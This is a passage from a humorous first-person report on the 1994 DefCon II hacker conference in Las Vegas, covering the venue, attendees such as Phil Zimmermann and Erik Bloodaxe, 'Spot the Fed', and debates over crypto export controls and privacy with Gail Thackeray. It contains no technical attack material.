you want, no matter how decadent, blasphemous, illegal or immoral, at any hour, is yours for the
asking, if you have cash or a clean piece of plastic.
So, it comes as no surprise, that sooner or later, (and it turns out to be sooner) that the hackers
of the world, the computer hackers, phone phreaks, cyber-spooks, Information Warriors, data
bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, virus writers and perhaps the
occasional Cyber Christ again picked Las Vegas as the 1994 site for DefCon II.
You see, hackers are like everyone else (sort of) and so they, too, decided that their
community was also entitled to hold conferences and conventions.
DefCon (as opposed to Xmas's HoHoCon), is the premier mid-year hacker extravaganza.
Indulgence gone wild, Vegas notwithstanding if previous Cons are any example; but now put a
few hundred techno-anarchists together in sin city USA, stir in liberal doses of illicit
controlled pharmaceutical substances, and we have a party that Hunter Thompson would be
proud to attend.
All the while, as this anarchistic renegade regiment marches to the tune of a 24 hour city, they are
under complete surveillance of the authorities. Authorities like the FBI, the Secret Service,
telephone security . . . maybe even Interpol. And how did the "man" arrive in tow behind the
techno-slovens that belong behind bars?
They were invited.
And so was I. Invited to speak. (Loose translation for standing up in front of hundreds of
hackers and being verbally skewered for having an opinion not in 100% accordance with their
own.)
"C'mon, it'll be fun," I was assured by DefCon's organizer, the Dark Tangent.
"Sure fired way to become mutilated monkey meat," I responded. Some hackers just can't take a
joke, especially after a prison sentence and no opposite-sex sex.
"No really, they want to talk to you . . ."
"I bet."
It's not that I dislike hackers - on the contrary. I have even let a few into my home to play with
my kids. It's just that, so many of antics that hackers have precipitated at other -Cons have
earned them a reputation of disdain by all, save those who remember their own non-technical
adolescent shenanigans. And I guess I'm no different. I've heard the tales of depraved
indifference, hotel hold-ups, government raids on folks with names similar to those who are
wanted for pushing the wrong key on the keyboard and getting caught for it. I wanted to see
teens and X- generation type with their eyes so star sapphire glazed over that I could trade them
for chips at the craps table.
Does the truth live up to the fiction? God, I hope so. It'd be downright awful and unAmerican if
500 crazed hackers didn't get into at least some serious trouble.
So I go to Vegas because, because, well, it's gonna be fun. And, if I'm lucky, I might even see an
alien spaceship.
For you see, the party has already begun.
I go to about 30 conventions and conferences a year, but rarely if ever am I so Tylonol and
Aphrin dosed that I decide to go with a severe head cold. Sympomatic relief notwithstanding I
debated and debated, and since my entire family was down with the same ailment I figured Vegas
was as good a place to be as at home in bed. If I could survive the four and half hour plane flight
without my Eustahian tubes rocketing through my ear drums and causing irreparable damage, I
had it made.
The flight was made tolerable becuase I scuba dive. Every few minutes I drowned out the drone
of the engines by honking uncontrollably like Felix Ungerto without his aspirator. To the chagrin
of my outspoken counter surveillance expert and traveling mate, Mike Peros and the rest of the
first class cabin, the captain reluctantly allowed be to remain on the flight and not be expelled
sans parachute somewhere over Southfork, Texas. Snort, snort. Due to extensive flirting with
the two ladies across the aisle, we made the two thousand mile trek in something less than 34
minutes . . . or so it seemed. Time flies took on new meaning.
For those who don't know, the Sahara Hotel is the dregs of the Strip. We were not destined for
Caesar's or the MGM or any of the new multi-gazillion dollar hotel cum casinos which produce
pedestrian stopping extravaganzas as an inducement to suck in little old ladies to pour endless
rolls of Washington quarters in mechanical bottomless pits. The Sahara was built some 200 years
ago by native slave labor whose idea of plumbing is clean sand and decorators more concerned
with a mention in Mud Hut Daily than Architectural Digest. It was just as depressingly dingy and
solicitly low class as it was when I forced to spend eleven days there (also with a killer case of the
flu) for an extended Comdex computer show. But, hey, for a hacker show, it was top flight.
"What hackers?" The desk clerk said when I asked about the show.
I explained. Computer hackers: the best from all over the country. "I hear even Cyber Christ
himself might appear."
Her quizzical look emphasized her pause. Better to ignore a question not understood than to
look stupid. "Oh, they'll be fine, We have excellent security." The security people, I found out
shortly thereafter knew even less: "What's a hacker?" Too much desert sun takes its toll. Proof
positive photons are bad for neurons.
Since it was still only 9PM Mike and I sucked down a couple of $1 Heinekens in the casino and
fought it out with Lineman's Switching Union representatives who were also having their
convention at the Sahara. Good taste in hotels goes a long way.
"$70,000 a year to turn a light from red to green?" we complained.
"It's a tension filled job . . .and the overtime is murder."
"Why a union?"
"To protect our rights."
"What rights?"
"To make sure we don't get replaced by a computer . . ."
"Yeah," I agreed. "That would be sad. No more Amtrak disasters." The crowd got ugly so we
made a hasty retreat under the scrutiny of casino security to our rooms. Saved.
Perhaps if I noticed or had read the original propaganda on DefCon, I might have known that
nothing significant was going to take place until the following (Friday) evening I might have
missed all the fun.
For at around 8AM, my congestion filled cavities and throbbing head was awakened by the sound
of an exploding toilet. It's kind of hard to explain what this sounds like. Imagine a toilet flushing
through a three megawatt sound system at a Rolling Stones concert. Add to that the sound of a
hundred thousand flue victims standing in an echo chamber cleansng their sinuses into a mountain
of Kleenex while three dozen football referees blow their foul whistles in unison, and you still
won't come close to the sheer cacophonous volume that my Saharan toilet exuded from within its
bowels. And all for my benefit.
The hotel manager thought I was kidding. "What do you mean exploded?"
"Which word do you not understand?" I growled in my early morning sub-sonic voice. "If you
don't care, I don't."
My bed was floating. Three or maybe 12 inches of water created the damnedest little tidal wave
I'd ever seen, and the sight and sound of Lake Meade in room 1487 only exascerbatd the
pressing need to relieve myself. I dried my feet on the extra bed linens, worried about
electrocution and fell back asleep. It could have been 3 minutes or three hours later - I have no
way to know - but my hypnogoic state was rudely interrupted by hotel maintenance pounding at
the door with three fully operational muffler- less jack hammers.
"I can't open it," I bellowed over the continual roar of my personal Vesuvius Waterfall. "Just
c'mon in." The fourteenth floor hallway had to resemble an underwater coral display becuase the
door opened ever so slowly..
"Holy Christ!"
Choking back what would have been a painful laugh, I somehow said with a smirk, "Now you
know what an exploding toilet is like."
For, I swear, the next two hours three men whose English was worse than a dead Armadillo
attempted to suck up the Nile River from my room and the hallway. Until that very moment in
time, I didn't know that hotels were outfitted with vacuum cleaners specifically designed to
vacuum water. Perhaps this is a regular event.
Everyone who has ever suffered through one bitches about Vegas buffets, and even the hackers
steered away from the Sahara's $1.95 "all you can eat" room: "The Sahara's buffet is the worst in
town; worse than Circus Circus." But since I had left my taste buds at 37,000 feet along with
schrapneled pieces of my inner ear, I sought out sustenance only to keep me alive another 24
hours.
By mid afternoon, I had convinced myself that outside was not the place to be. After only
eighteen minutes of 120 sidewalk egg- cooking degrees, the hot desert winds took what was left
of my breath away and with no functioning airways as it was, I knew this was a big mistake. So,
hacker convention, ready or not, here I come.
Now, you have to keep in mind that Las Vegas floor plans are designed with a singular purpose in
mind. No matter where you need to go, from Point A to Point B or Point C or D or anywhere, the
traffic control regulations mandated by the local police and banks require that you walk by a
minimum of 4,350 slot machines, 187 gaming tables of various persuasions and no less than 17
bars. have they no remorse? Madison Avenue ad execs tale heed!
.
So, lest I spend the next 40 years of my life in circular pursuit of a sign-less hacker convention
losing every last farthing I inheroted from dead Englishmen, I asked for the their well hidden
location at the hotel lobby.
"What hackers?" There goes that nasty photon triggered neuron depletion again.
"The computer hackers."
"What computer hackers. We don't have no stinking hackers . . ." Desk clerk humor, my
oxymoron for the week.
I tried the name: DefCon II.
"Are we going to war?" one ex-military Uzi-wielding guard said recognizing the etymology of
the term.
"Yesh, it's true" I used my most convincing tone. "The Khasakstanis are coming with nuclear
tipped lances riding hundred foot tall horses. Paris has already fallen. Berlin is in ruins. Aren't
you on the list to defend this graet land?"
"Sure as shit am!" He scampered off to the nearest phone in an effort to be the first on the front
lines. Neuron deficiency beyong surgical repair..
I slithered down umpteen hallways and casino aisles lost in the jungleof jingling change. Where
the hell are the hackers? "They must be there," another neuron-impoverished Saharan employee
said as he pointed towards a set of escalators at the very far end of the casino.
All the way at the end of the almost 1/4 mile trek through Sodom and Gonorrhea an 'up' escalator
promised to take me to hackerdom. Saved at last. Upstairs. A conference looking area. No signs
anywhere, save one of those little black Velcro-like stick-em signs where you can press on white
block letters.
No Mo Feds
I must be getting close. Aha, a maintenance person; I'll ask him. "What hackers? What's
DefCon."
Back downstairs, through the casino, to the front desk, back through the casino, up the same
escalator again. Room One I was told. Room One was empty. Figures. But, at the end of a
hallway, past the men's room and the phones, and around behind Room One I saw what I was
looking for: a couple of dozen T-shirted, Seattle grunged out kids (read: under 30) sitting at
uncovered six foot folding tables hawking their DefCon II clothing, sucking on Heinekens and
amusing themselves with widely strewn backpacks and computers and cell phones.
I had arrived!
* * * *
You know, regular old suit and tie conferences could learn a thing or two from Jeff Moss, the
man behind DefCon II. No fancy badge making equipment; no $75 per hour union labor built
registration desks; no big signs proclaiming the wealth of knowledge to be gained by signing up
early. Just a couple of kids with a sheet of paper and a laptop.
It turned out I was expected. They handed me my badge and what a badge it was. I'm color
blind, but this badge put any psychedelically induced spectral display to shame. In fact it was a
close match to the Sahara's mid 60's tasteless casino carpeting which is so chosen as to hide the
most disgusting regurgative blessing. But better and classier.
The neat thing was, you could (in fact had to) fill out your own badge once your name was
crossed off the piece of paper that represented the attendee list.
Name:
Subject of Interest: E-Mail:
Fill it out any way you want. Real name, fake name, alias, handle - it really doesn't matter cause
the hacker underground ethic encourages anonymity. "We'd rather not know who you are
anyway, unless you're a Fed. Are you a Fed?"
A couple of lucky hackers wore the ultimate badge of honor. An "I Spotted A Fed" T-shirt. This
elite group sat or lay on the ground watching and scouring the registration area for signs that
someone, anyone, was a Fed. They really didn't care or not if you were a Fed - they wanted the
free T-shirt and the peer respect that it brought.
I'm over 30 (OK, over 35) and more than a few times (OK, a little over 40) I had to vehemently
deny being a Fed. Finally Jeff Moss came to the rescue.
"He's not a Fed. He's a security guy and a writer."
"Ugh! That's worse. Can I get a T-shirt cause he's a writer?" No way hacker-breath.
Jeff. Jeff Moss. Not what I expected. I went to school with a thousand Jeff Mosses. While I had
hair down to my waist, wearing paisley leather fringe jackets and striped bell bottoms so wide I
appeared to be standing on two inverted ice cream cones, the Jeff Mosses of the world kept their
parents proud. Short, shsort cropped hair, acceented by an ashen pall and clothes I stlll wouldn't
wear today. They could get away with anything cause they didn't look the part of radical chic.
Jeff, I really like Jeff: he doesn't look like what he represents. Bruce Edelstein, (now of HP fame)
used to work for me. He was hipper than hip but looked squarer than square. Now today that
doesn't mean as much as it used to, but we ex-30-somethings have a hard time forgetting what
rebellion was about. (I was suspended 17 times in the first semester of 10th grade for wearing
jeans.)
Jeff would fit into a Corporate Board Meeting if he wore the right suit and uttered the right
eloquencies: Yes, that's it: A young Tom Hanks. Right. I used to hate Tom Hanks (Splach, how
fucking stupid except for the TV-picture tube splitting squeals) but I've come to respect the hell
out of him as an actor. Jeff never had to pass through that first phase. I instantly liked him and
certainly respect his ability to pull off a full fledged conference for only $5000.
You read right. Five grand and off to Vegas with 300 of your closest personal friends, Feds in
tow, for a weekend of electronic debauchery. "A few hundred for the brochure, a few hundred
hear, a ton in phone bills, yeah, about $5000 if no one does any damage." Big time security
shows cost $200,000 and up. I can honestly say without meaning anything pejorative at any of
my friends and busienss acquaintances, that I do not learn 40 times as much at the 'real' shows.
Something is definitely out of whack here. Suits want to see suits. Suits want to see fancy.
Suits want to see form, substance be damned. Suits should take a lesson from my friend Jeff.
* * * * *
I again suffered through a tasteless Saharan buffer dinner which cost me a whopping $7.95. I
hate grits -buttered sand is what I call them - but in this case might well have been preferable.
Somehow I coerced a few hackers to join me in the ritualistic slaughter of our taste buds and
torture of our intestines. They were not pleased with my choice of dining, but then who gives a
shit? I couldn't anything anyway. Tough.
To keep out minds off of the food we talked about something much more pleasant: the recent
round of attacks on Pentagon computers and networks. "Are the same people involved as in the
sniffing attacks earlier this year?" I asked my triad of dinner mates.
"Indubitably."
"And what's the reaction from the underground - other hackers?"
Coughs, sniffs. Derivie visual feedback. Sneers. The finger.
"We can't stand 'em. They're making it bad for everybody." Two fingers.
By and large the DefCon II hackers are what I call 'good hackers' who hack, and maybe crack
some systems upon occasion, but aren't what I refer to as Information Warriors in the bad sense
of the word. This group claimed to extol the same position as most of the underground would:
the Pentagon sniffing crackers - or whoever who is assaulting thousands of computers on the net -
must be stopped.
"Scum bags, that what they are." I asked that they not sugarcoat their feelings on my behalf. I
can take it. "These fuckers are beyond belief; they're mean and don't give a shit how much
damage they do." We played with our food only to indulge inthe single most palatable edible on
display: ice cream with gobs of chocolate syrup with a side of coffee. .
The big question was, what to do? The authorities are certainly looking for a legal response;
perhaps another Mitnick or Phiber Optik. Much of the underground cheered when Mark Abene
and others from the reknowned Masters of Destruction went to spend a vacation at the expense of
the Feds. The MoD was up to no good and despite Abene's cries that there was no such thing as
the MoD, he lost and was put away. However many hackers believe as I do, that sending Phiber
to jail for hacking was the wrong punishment. Jail time won't solve anything nor cure a hacker
from his first love. One might as well try to cure a hungry man from eating: No, Mark did
wrong, but sending him to jail was wrong, too. The Feds and local computer cops and the courts
have to come up with punishments appropriate to the crime. Cyber-crimes (or cyber-errors)
should not be rewarded by a trip to an all male hotel where the favorite toy is a phallically carved
bar of soap.
On the other hand, hackers in general are so incensed over the recent swell of headline grabbing
break-ins, and law enforcement has thus far appeared to be impotent, ("These guys are good.")
that many are searching for alternative means of retribution.
"An IRA style knee capping is in order," said one.
"That's not good enough, not enough pain," chimed in another. (Sip, sip. I can almost taste the
coffee.)
"Are you guys serious?" I asked. Violence? You? I thought I knew them better than that. I know
a lot of hackers, none that I know of is violent, and this extreme Pensacola retributition attitude
seemed tottally out of character. "You really wouldn't do that, would you?" My dinner
companions were so upset and they claimed to echo the sentiment of all good-hackers in good
standing, that yes, this was a viable consideration.
"The Feds aren't doing it, so what choice do we have? I've heard talk about taking up a collection
to pay for a hit man . . ." Laughter around, but nervous laughter.
"You wouldn't. . ." I insisted.
"Well, probably not us, but that doesn't mean someone else doesn't won't do it."
"So you know who's behind this whole thing."
"Fucking-A we do," said yet another hacker chomping at the bit. He was obviously envisioning
himself with a baseball bat in his hand.
"So do the Feds."
So now I find myself in the dilemma of publishing the open secret of who's behind the Internet
sniffing and Pentagon break ins, but after talking to people from both the underground and law
enforcement, I think I'll hold off awhile It serves no immediate purpose other than to warn off the
offenders, and none of us want that.
Obviously all is not well in hacker-dom.
* * * * *
The registration area was beyond full; computers, backpacks everywhere, hundreds of what I have
to refer to as kids and a fair number of above ground security people. Padgett Peterson of Martin
Marietta was going to talk about viruses, Sara Gorden on privacy, Mark Aldrich is a security guy
from DC., and a bunch of other folks I see on the seemingly endless security trade show circuit.
Jeff Moss had marketed himself and the show excellently. Los Angeles send a TV crew, John
Markoff from the New York Times popped in as did a writer from Business Week. (And of
course, yours truly.)
Of the 360 registrees ("Plus whoever snuck in," added Jeff) I guess about 20% were so-called
legitimate security people. That's not to belittle the mid-20's folks who came not because they
were hackers, but because they like computers. Period. They hack for themselves and not on
other systems, but DefCon II offered something for everyone.
I remember 25 years ago how my parents hated the way I dressed for school or concerts or just to
hang out: God forbid! We wore those damned jeans and T-shirts and sneakers or boots! "Why
can't you dress like a human being," my mother admonished me day after day, year after year. So
I had to check myself because I can't relate to Seattle grunge-ware. I'm just too damned old to
wear shirts that fit like kilts or sequin crusted S&M leather straps. Other than the visual
cacophony of dress, every single hacker/phreak that I met exceeded my expectations in the area of
deportment.
These are not wild kids on a rampage. The stories of drug-induced frenzies and peeing in the
hallways and tossing entire rooms of furniture out of the window that emanated from the
HoHoCons seemed a million miles away. This was admittedly an opportunity to party, but not to
excess. There was work to be done, lessons to be learned and new friends to make. So getting
snot nosed drunk or ripped to the tits or Ecstatically high was just not part of the equation. Not
here.
Now Vegas offers something quite distinct from other cities which host security or other
conventions. At a Hyatt or a Hilton or any other fancy-ass over priced hotel, beers run $4 or $5 a
crack plus you're expected to tip the black tied minimum wage worker for popping the top. The
Sahara (for all of the other indignities we had to suffer) sosmewhat redeemed itself by offering an
infinite supply of $1 Heinekens. Despite hundreds of beer bottle spread around the huge
conference area (the hotel was definitely stingy in the garbage pail business) public drunkenness
was totally absent. Party yes. Out of control? No way. Kudos!
Surprisingly, a fair number of women (girls) attended. A handful were there 'for the ride' but
others . . . whoa! they know their shit.
I hope that's not sexist; merely an observation. I run around so few technically fluent ladies it's
just a gut reaction. I wish there were more. In a former life, I owned a TV/Record production
company called Nashville North. We specialized in country rock taking advantage of the Urban
Cowboy fad in the late 1970's. Our crew of producers and engineers consisted of the "Nashville
Angels." And boy what a ruckus they would cause when we recorded Charlie Daniels or Hank
Williams: they were stunning. Susan produced and was a double fo Jacqueline Smith; we called
Sally "Sabrina" because of her boyish appearance and resemblance to Kate Jackson. A super
engineer. And there was Rubia Bomba, the Blond Bombshell, Sherra, who I eventually married:
she knew country music inside and out - after all she came from Nashville in the first place.
When we would be scheduled to record an act for live radio, some huge famous country act like
Asleep at The Wheel of Merle Haggard or Johnny Paycheck or Vassar Clements, she would
wince in disbelief when we cried, "who's that?" Needless to say, she knew the songs, the cues and
the words. They all sounded alike. Country Music? Ecch. (So I learned.)
At any rate, ladies, we're equal opportunity offenders. C'mon down and let's get technical.
As the throngs pressed to register, I saw an old friend, Erik Bloodaxe. I've known him for several
years now and he's even come over to baby sit the kids when he's in town. (Good practice.) Erik
is about as famous as they come in the world of hackers. Above ground the authorities
investigated him for his alleged participation in cyber crimes: after all, he was one of the founders
of the Legion of Doom, and so, by default, he must have done something wrong. Never
prosecuted, Erik Bloodaxe lives in infamy amongst his peers. To belay any naysayers, Erik
appeared on every single T-shirt there.
"I Only Hack For Money,"
Erik Bloodaxe
proclaimed dozens of shirts wandering through the surveillance laden casinos. His is a name that
will live in infamy.
So I yelled out, "Hey Chris!" He gave his net-name to the desk/table registrar. "Erik Bloodaxe."
"Erik Bloodaxe?" piped up an excited high pitched mail voice. "Where?" People pointed at Chris
who was about to be embarrassingly amused by sweet little tubby Novocain who practically
bowed at Chris's feet in reverence. "You're Erik Bloodaxe?" Novocain said with nervous awe -
eyes gleaming up at Chris's ruddy skin and blond pony-tail.
"Yeah," Chris said in the most off handed way possible. For people who don't know him this
might be interpreted as arrogance (and yes there is that) but he also has trouble publicly accepting
the fame and respect that his endearing next-generation teenage fans pour on him.
"Wow!" Novocain said with elegance and panache. "You're Erik Bloodaxe." We'd just been
through that said Chris's eyes.
"Yeah."
"Wow, well, um, I . . . ah . . . you're . . . I mean, wow, you're the best." What does Sylvia Jane
Miller from Rumpsteer, Iowa say to a movie star? This about covered it. The Midwest meets
Madonna. "Wow!" Only here it's Novocain meets Cyber Christ himself.
Like any other security show or conference or convention there is a kickoff, generally with a
speech. And DefCon II was no exception. Except.
Most conventional conventions (ConCons) start at 7:30 or 8:00 AM because, well I don't know
exactly why, except that' when so- called suits are expected to show up in their cubicles.
DefCon, on the other hand, was scheduled to start at 10PM on Friday night when most hakcers
show up for work. Most everyone had arrived and we were anxiously awaiting the opening
ceremonies. But, here is where Jeff's lack of experience came in. The kick- off speaker was
supposed to be Mark Ludwig of virus writing fame and controversy. But, he wasn't there!
He had jet lag.
"From Phoenix?" I exclaimed in mock horror to which nearby hackers saw the absurdity of a 45
minute flight jet lag. Mark has a small frame and looks, well, downright weak, so I figured maybe
flying and his constitution just didn't get along and he was massaging his swollen adenoids in his
room.
"Oh, no! He's just come in from Australia . . ." Well that explains it, alright! Sorry for the
aspersions, Mark.
But Jeff didn't have a back up plan. He was screwed. Almost four hundred people in the audience
and nothing to tell them. So, and I can't quite believe it, one human being who had obviously
never stood in front of a live audience before got up in an impromptu attempt at stand up comedy.
The audience was ready for almost anything entertaining but this guy wasn't. Admittedly it was a
tough spot, but . . .
"How do you turn a 496 into an 8088?"
"Add Windows." Groan. Groan.
"What's this?" Picture the middle three fingers of your right hand wiggling madly.
"An encrypted this!" Now hold out just the middle finger. Groan. Groan.
"What's this?" Spread your legs slightly apart, extend both hands to the front and move them
around quickly in small circles
"Group Air Mouse." Groan.
The evening groaned on with no Mark nor any able sharp witted comedian in sight.
Phil Zimmerman wrote PGP and is a God, if not Cyber-Christ himself to much of the global
electronic world. Preferring to call himself a folk hero (even the Wall Street Journal used that
term) Phil's diminutive height combined with a few too many pounds and a sweet as sweet can be
smile earn him the title of Pillsbury Dough Boy look alike. Phil is simply too nice a guy to be
embroiled in a Federal investigation to determine if he broke the law by having PGP put on a net
site. You see, the Feds still think they can control Cyberspace, and thereby maintain antique
export laws: "Thou shalt not export crypto without our approval" sayeth the NSA using the
Department of Commerce as a whipping boy mouth piece. So now Phil faces 41-51 months of
mandatory jail time if prosecuted and convicted of these absurd laws.
Flying in from Colorado, his appearance was anxiously awaited. "He's really coming?" " I wonder
what he's like?" (Like eevryone else, fool, just different.) When he did arrive, his shit- eating grin
which really isn't a shit-eating grin, it's just Phil's own patented grin, preceeded him down the
hallway.
"Here he is!" "It's Phil Zimmerman." Get down and bow. "Hey, Phil the PGP dude is here."
He was instantly surrounded by those who recognize him and by both those who don't but want to
feel like part of the in-crowd. Chat chat, shit-eating grin, good war stories and G-rated
pleasantries. Phil was doing what he does best: building up the folk hero image of himself. His
engaging personality (even though he can't snorkel to save his ass) mesmerized the young-uns of
the group. "You're Phil?"
"Yeah." No arrogance, just a warm country shit-eating grin that's not really shit-eating. Just Phil
being Phil. He plays the part perfectly.
Despite the attention, the fame, the glory (money? nah . . .) the notoriety and the displeased eyes
of onlooking Computer Cops who really do believe he belongs in jail for 4 years, Phil had a
problem tonight. A real problem.
"I don't have a room!" he quietly told Jeff at the desk. "They say I'm not registered." Np panic.
Just a shit-eating grin that's not a shit-eating grin and hand the problem over the experts: in this
case Jeff Moss. Back to his endearing fans. Phil is so damned kind I actually saw him giving
Cryptography 101 lessons on the corner of a T-shirt encrusted table. "This is plaintext and this is
crypto. A key is like a key to your hotel room . . . " If Phil had a hotel room.
Someone had screwed up. Damn computers. So the search was on. What had happened to Phil's
room? Jeff is scrambling and trying to get the hotel to rectify the situation Everyone was abuzz.
Phil, the crypto-God himself was left out in the cold. What would he do?
When suddenly, out of the din in the halls, we heard one voice above all the rest:
"Phil can sleep with me!"
Silence. Dead stone cold silence. Haunting silence like right after an earthquake and even the
grubs and millipedes are so shaken they have nothing to say. Silence.
The poor kid who had somehow instructed his brain to utter the words and permitted them to rise
through his esophagus and out over his lips stood the object of awe, incredulity and mental
question marks. He must have thought to himself, "what's everyone staring at? What's going on?
Let me in on it." For the longest 10 seconds in the history of civilization he had absolutely no clue
that he was the target of attention. A handful of people even took two or three steps back, just in
case. Just in case of what was never openly discussed, but nonetheless, just in case.
And then the brain kicked in and a weak sheepish smile of guilt overcame this cute acne-free
baby-butt smooth-faced hacker who had certainly never had a shave, and was barely old enough
to steer his own pram.
"Ohhhhhh . . . . noooooo," he said barely louder than a whisper. "That' not what I mean!"
I nearly peed laughing so hard in unison with a score of hackers who agreed that these misspoken
words put this guy in the unenviable position of being the recipient of a weekend of eternal
politically incorrect ridicule.
"Yeah, right. We know what you mean . . "
"No really . . ." he pleaded as the verbal assaults on his alleged sexual preferences were slung one
after the other.
This poor kid never read Shakespeare: "He who doth protest too much . . ."
If we couldn't have a great kickoff speech, or comedian, this would have to do.
The majority of the evening was spent making acquaintances:
"Hi, I'm Jim. Oops, I mean 'Septic Tank," was greeted with "Oh, you're Septic. I'm Sour Milk."
(Vive la difference!) People who know each other electronically are as surprised to meet their
counterparts as are first daters who are in love with the voice at the other end of the phone.
"Giving good phone" implies one thing while "Having a great keystroke" just might mean another.
The din of the crowd was generally penetrated by the sounds of a quasi-pornographic Japanese
high tech toon of questionable socially redeeming value which a majority of the crowd appeared
to both enjoy and understand. I am guilty of neither by reason of antiquity.
And so it goes.
* * * * *
Phil Zimmerman must have gotten a room and some sleep because at 10AM (or closely
thereafter) he gave a rousing (some might say incendiary) speech strongly attacking the
government's nearly indefensible position on export control
I was really impressed. Knowing Phil for some time, this was the first time I ever heard him speak
and he did quite an admirable job. He ad libs, talks about what he want to talk about and does so
in a compelling and emotional way. His ass is on the line and he should be emotional about it.
The audience, indeed much of counter culture Cyberspace loves Phil and just about anything he
has to say. His affable 40-something attorney from Colorado, Phil DuBois was there to both
enjoy the festivities and, I'm sure, to keep tabs on Phil's vocalizations. Phil is almost too honest
and open for his own good. Rounds and rounds of sincere appreciation.
Hey kids, now it's time for another round of Spot The Fed. Here's your chance to win one of
these wonderful "I Spotted A Fed" T-shirts. and all you have to do is ID a fed and it's yours.
Look around you? Is he a Fed? Is she under cover or under the covers? Heh, heh. Spot the Fed
and win a prize. This one-size- fits-all XXX Large T-shirt is yours if you Spot the Fed. I had to
keep silent. That would have been cheating. I hang out on both sides and have a reputation to
maintain.
"Hey, I see one" screeched a female voice (or parhaps it was Phil's young admirer) from the left
side of the 400+ seat ballroom. Chaos! Where? Where? Where's the fed? Like when Jose
Consenko hits one towards the center field fence and 70,000 screaming fans stand on their seats
to get a better view of a ball 1/4 mile away flying at 150 miles per hour, this crowd stood like
Lemmings in view of Valhalla the Cliff to espy the Fed. Where's the Fed?
Jeff jumped off the stage in anxious anticipation that yet another anti-freedom-repressive law
enforcement person had blown his cover. Where's the Fed? Jeff is searching for the accuser and
the accused. Where's the Fed? Craned necks as far as the eye can see; no better than rubber
neckers on Highway 95 looking for steams of blood and misplaced body parts they half expected
a Fed to be as distinctly obvious as Quasimoto skulking under the Gorgoyled parapits of Notre
Dame. No such like. They look like you and me. (Not me.) Where's the Fed?
He's getting closer, closer to the Fed. Is it a Fed? Are you a Fed? C'mon, fess up. You're a a
fed. Nailed. Busted. Psyche!
Here's your T-shirt. More fun than Monty Hall bringing out aliens from behind Door #3 on the
X-Files. Good clean fun. But they didn't get 'em all. A couple of them were real good. Must
have been dressed like an Hawaiian surf bum or banshee from Hellfire, Oregon. Kudos to those
Feds I know never got spotted. Next year, guys. There's always next year.
Phil's notoriety and the presence of the Phoenix,Arizona prosecutor who was largely responsible
for the dubiously effective or righteous Operation Sun Devil, Gail Thackeray ("I change job every
4 years or so - right after an election") brought out the media. The LA TV station thought they
might have the makings of a story and sent a film crew for the event.
"They're Feds. The ones with the cameras are Feds. I know it. Go ask 'em." No need. Not.
"Put away that camera." At hacking events it's proper etiquette to ask if people are camera shy
before shooting. The guy that I was sitting next to buried his face in his hands to avoid being
captured on video tape.
"What are you; a Fed or a felon?" I had to ask.
"What's the difference," his said. "They're the same thing." So which was it, I wondered. For the
truly paranoid by the truly paranoid.
"Get that thing outta here," he motioned to the film crew who willingly obliged by turning off the
lights. "They're really Feds," he whispered to me loud enough for the row in front and behind us
to hear.
I moved on. Can't take chances with personal safety when I have kids to feed. Fed or felon, he
scared me.
Gail Thackeray: was the next act on stage. She was less in agreement about Phil Zimmerman than
probably anyone (except the undetected Feds) in the audience. She, as expected, endorsed much
of the law enforcement programs that revolve around various key management (escrow) schemes.
Phil recalls a letter from Burma that describe how the freedom fighters use PGP to defend
themselves against repression. He cites the letter from Latvia that says electronic freedom as
offered by PGP is one of the only hopes for the future of a free Russia. Gail empathizes but sees
trouble closer to home. Terrorism a la World Trade Center, or rocket launchers at O'Hare
Airport, or little girl snuff films in Richmond, Virginia, or the attempt to poison the water supply
outside of Boston. These are the real threats to America in the post Cold War era.
"What about our personal privacy!" cries a voice. "We don't want the government listening in.
It's Big Brother 10 years behind schedule."
Gail is amused. She knew it would be a tough audience and has been through it before. She is
not shaken in the least.
"I've read your mail," she responds. "Its not all that interesting." The audience appreciates a
good repartee. "You gotta pay me to do this, and frankly most of it is pretty boring." She
successful made her point and kept the audience laughing all the way.
She then proceeded to tell that as she sees it, "The expectation of privacy isn't real." I really don't
like hearing this for I believe in the need for an Electronic Bill of Rights. I simply think she's
wrong. "History is clear," she said "the ability to listen in used to be limited to the very few. The
telegraph was essentially a party line and still today in some rural areas communications have
never been private. Why should we change it now?"
"Gail, you're so full of shit!" A loud voice bellowed from next me again. Boy can I pick seats.
"You know perfectly well that cops abuse the laws and this will just make their jobs easier. Once
people find a way to escape tyranny you all want to bring it right back again. This is revolution
and you're scared of losing. This kind of puke scum you're vomiting disgusts me. I just can't take
it any more. " Yeah, right on. Scattered applause. While this 'gent' may have stated what was on
many minds, his manner was most unbefitting a conference and indeed, even DefCon II. This was
too rude even for a hacker get-together. The man with the overbearing comments sat down
apologizing. "She just gets me going, she really does. Really pisses me off when she goes on like
about how clean the Feds are. She knows better than to run diarrhea of the mouth like that."
"You know," she continued. "Right across the street is a Spy Shop. One of those retail stores
where you can buy bugs and taps and eavesdropping equipment?" The audience silently nodded.
"We as law enforcement are prohibited by law from shopping there and buying those same things
anyone else can. We're losing on that front." Cheers. Screw the Feds.
I don't agree with ever thing that Gail says, but she is a compelling speaker; she believes in what
she says. But I do agree with her on the difficulty of forensic evidence in computer cases."
"I got really mad," she said. "I was reading a magazine and there was an ad for United, you
know, the employee owned airline. And it was a beautiful ad, hundred of employees standing in
front of a brand new great big jet. All smiling and happy." Gail then frowned deeply. "Some
stockholder ought to sue them for misleading advertising." This was more like it! Go, Gail! "I
started to look at the picture carefully and I noticed this unmistakably fat lady in a pink dress.
And then over a few persons. . .guess what? The same fat lady in pink." Roars of laughter and
applause.
Her point? What seems real may not be real at all, and with a few hundred dollars in software and
a little practice, most anyone can build a false reality digitally.
Her time was up but the audience wanted more. She was mobbed for eternity by hackers who
fight her tooth and nail but respect her comportment enough to make the disagreements lively,
partisan, entertaining, but with respect. Respectful hackers. No HoHoCon orgies; merely verbal
barbs with no solution. Everyone knew that, but it's the battle that counts.
More security conference should be this open, this honest and informative, with all kinds of
people with all kinds of opinions. That is how we, and I, learn. Listen and learn. And all for
$5000 no less, plus a paltry $15 entrance fee.
* * * * *
The afternoon sessions were filled with a mixture of anti-government, pro-privacy advocacy, virus
workshops and such by both under and above ground folks. Padgett Peterson's knowledge of
viruses is deep and he spread the same wisdom as his does in so called legitimate circles.
Knowledge is knowledge, and better accurate than wrong.
It's often surprising to see how people will voice the same opinion in varying degree of intensity
depending upon their audience. Mark Aldrich of General Research Corp. in the Washington area
made a statement that I doubt I would hear at a ConCon. "Fear your government that fears your
crypto. Use crypto as weapon." Sara Gordon's panel discussion on crypto and privacy and related
topics fueled the audience's general anti-fed attitude.
